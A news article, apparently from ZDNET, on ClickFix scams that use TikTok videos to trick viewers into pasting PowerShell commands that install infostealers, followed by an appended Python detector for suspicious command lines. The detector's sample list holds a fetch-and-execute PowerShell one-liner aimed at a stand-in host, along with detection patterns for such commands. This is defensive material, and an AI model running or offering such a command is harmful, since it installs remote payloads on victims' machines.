
ZDNET Highlights
- TikTok is a delivery platform for ClickFix social engineering attacks.
- We found live video examples of the scam for Photoshop and Windows.
- ClickFix is a popular new method of choice for threat actors.
TikTok is being used as a delivery platform to spread information-stealing malware and other payloads, with free software serving as bait.
Senior ISC handler Xavier Mertens said on 17 October, in a post published on the SANS Institute’s Internet Storm Center website, that the wave of attacks on TikTok leveraged ClickFix social engineering techniques to trick victims into downloading malware onto their systems.
In the example video posted by Mertens, a scammer has posted content – with over 500 likes – that pretends to offer viewers an easy way to activate Photoshop for free.
The victim is asked to start PowerShell as an administrator and run a line of code, which then executes “Updater.exe”. The file is actually AuroStealer, a Trojan designed to steal credentials and system information. Additional shellcode is also launched in memory.
ZDNET searched TikTok for similar videos and was surprised by how many were live. For example, in the screenshot below, the author was promoting a fake way to download and install Adobe Photoshop without requiring a license. Other examples we found include fake, free ways to license Microsoft Windows.
What is ClickFix?
ClickFix is a particularly nasty social engineering technique that attempts to bypass traditional anti-phishing protections by tricking users into “hacking” themselves.
Instructions are given in some form, which may include using a Windows shortcut and copy-pasting a snippet of code into the command prompt to trigger a PowerShell script. These instructions are laid out in a way that is easy to follow and are given a fake purpose, such as fixing a minor technical glitch, getting paid software for free, or a “life hack” to improve popular streaming services.
Once the victim has unknowingly opened their device to the exploit, a malicious payload is deployed and executed. Malware reported in ClickFix campaigns includes information stealers, remote access trojans (RATs), ransomware, and worms.
Is this the first time TikTok and ClickFix have been linked?
Sadly, no. Back in March, cybersecurity researchers from Trend Micro reported that TikTok videos, potentially generated through AI tools, were being distributed on the platform to spread the Vidar and StealC information-stealing malware. A network of faceless accounts posted videos on topics including improving Spotify, with step-by-step instructions that instead launched a PowerShell command to load the malware.
“The massive user base and algorithmic reach of social media platforms provides an ideal delivery mechanism for threat actors,” the researchers said. “For attackers, this means widespread distribution without the logistical burden of maintaining infrastructure.”
Earlier this month, Microsoft warned that ClickFix was becoming increasingly popular as a method to infiltrate networks, steal data and deploy malware.
In the Redmond giant’s latest Digital Defense Report, Microsoft said that since 2024, the ClickFix strategy has been recorded as the method of initial access in 47% of attacks, ahead of phishing and password “spray and pray” attack methods.
How do I protect myself from ClickFix attacks?
If you are not sure about the source of the code or its true purpose, do not execute commands on your device, especially if you found the instructions on social media, where they are unlikely to be scrutinized. Now that you know this social engineering method exists, remain skeptical. Tell your friends, too.
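For defenders who review PowerShell command lines in endpoint logs, the pasted one-liners described above tend to share a few traits that can be triaged automatically. The sketch below is an added example, not code from ZDNET, SANS or Microsoft; the indicator patterns are assumptions to tune per environment, and the sample command lines are constructed.

```python
import re

# Heuristic patterns (assumptions for this example; tune them for your environment).
INDICATORS = {
    # Pulls content from a remote host.
    "remote_fetch": re.compile(
        r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|curl|wget)\b"
        r"|Download(String|File|Data)", re.I),
    # Runs a string as code, so nothing needs to be written to disk first.
    "in_memory_exec": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    # Hides the console window from the user.
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
    # Base64-encoded command that the user cannot read before running it.
    "encoded_command": re.compile(
        r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}


def indicators(command: str) -> set[str]:
    """Return the names of all indicators present in a command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(command)}


def verdict(command: str) -> str:
    """Classify a command line as 'block', 'review' or 'ok'."""
    hits = indicators(command)
    if {"remote_fetch", "in_memory_exec"} <= hits or "encoded_command" in hits:
        return "block"   # fetch-and-run, or a payload the user cannot read
    return "review" if hits else "ok"


# Constructed sample command lines (example.invalid never resolves).
SAMPLES = [
    'powershell -w hidden -c "iex (irm https://example.invalid/fix)"',
    "powershell -NoProfile -enc " + "QQBCAEMARAA=" * 3,  # harmless filler
    "Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip",
    "Get-ChildItem C:\\Users -Recurse",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(f"{verdict(cmd):6}  {sorted(indicators(cmd))}  {cmd[:60]}")
```

A "review" verdict is deliberately noisy: administrators fetch files legitimately, so only the fetch-and-run combination or an encoded command is treated as blocking.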

